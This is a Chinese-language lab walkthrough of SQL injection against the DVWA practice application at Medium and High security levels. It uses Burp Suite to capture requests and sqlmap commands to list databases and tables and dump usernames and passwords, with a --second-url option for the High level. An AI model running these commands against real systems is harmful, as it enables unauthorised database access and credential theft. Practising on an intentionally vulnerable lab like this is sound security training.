前情提要:

注意:该文中我主要采取的是sqlmap工具的方式进行注入)

我已经配置了的环境与安装好的软件:

  • 小皮面板中的MySQL和Apache环境已经开启
  • 有火狐浏览器,且已经安装好了FoxyProxy网络代理的插件
  • 已经自行安装好了burp suite抓包工具
  • 有sqlmap自动注入的工具
  1. 打开小皮面板中的Apache和MySQL环境

    image-20251203185955238

  2. 从小皮面板中的【网站】打开dvwa靶场

    image-20251203190041029

  3. 进入网站后,我会选择把地址复制粘贴到火狐浏览器中进行下一步(火狐浏览器能方便我们后续的注入操作)

    image-20251203190130331

  4. 输入登录信息后,更改DVWA Security的等级为Medium

    image-20251203190203987

  5. 进入SQL Injection模块中

    image-20251203190524421

  6. 打开我们已经配置好的FoxyProxy代理(对应burp suite抓包工具的地址)

    image-20251203190636448

  7. 打开我们的burp suite抓包工具,开启拦截(拦截是打开的时候就默认开启的)
    image-20251203190725206

SQL Injection——Medium

Medium级别和low级别的SQL Injection有很大不同,没法从输入框进行注入了

可以采取以下的方法:

  1. 尝试burp suite抓包工具进行注入【手工注入】
  2. 使用sqlmap工具进行注入【自动执行】

使用sqlmap工具进行注入

  1. 在我们的DVWA界面中选择一个用户的id,使我们的抓包工具成功抓到包

    image-20251203191347120

  2. 抓到的包我们放到重发器(Repeater)中

    image-20251203191424515

  3. 创建一个新的txt文件(推荐命名为dvwa_m)【在sqlmap的文件中】

    image-20251203191513416

  4. 把我们放在重发器中的内容复制粘贴进去

    image-20251203191943603

image-20251203192107601

  1. 打开我们的sqlmap工具,在有sqlmap.py的文件路径下直接输入“cmd”进入命令行

    image-20251203192133686

  2. 使用python sqlmap.py -h进入sqlmap中(中间按enter)

image-20251203192314244

  1. 获得数据库:

    python .\sqlmap.py -r .\dvwa-m.txt -dbs
    

    image-20251203105615402

  2. 获取表格:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa --tables
    

    image-20251203105821203

  3. 获取表格的字段数据:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users --columns
    

    image-20251203105835106

  4. 获取字段内容:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users -C user --dump
    

    image-20251203110346837

注意的小点:
  • 在抓包工具中复制的信息的是完整的,不要有错/漏的地方
  • 确保自己的DVWA网站仍在运行中(没有退出等)
  • 确保文件名正确

SQL Injection——High

【简略了很多的步骤和操作过程,但运行其实和Medium是差不多的,只是比Medium多了一个页面,可以不用使用我的这种sqlmap的方法也能做到,直接在第二个弹出的页面当中使用low级别时候的操作就可以了】

high级别通关方法

  • 在第二个页面中采用low测试的方法进行注入
  • 使用参数--second-url进行注入

获取所有数据库:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" --dbs

image-20251203111949953

获取所有表格:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa --tables

image-20251203112018742

获取所有字段:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users --columns

image-20251203112103528

获取所有的字段内容:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users -C "user,password" --dump

image-20251203113351085

--second-url+查询结果显示页面链接,将会无视这种链接防御

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/986015.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!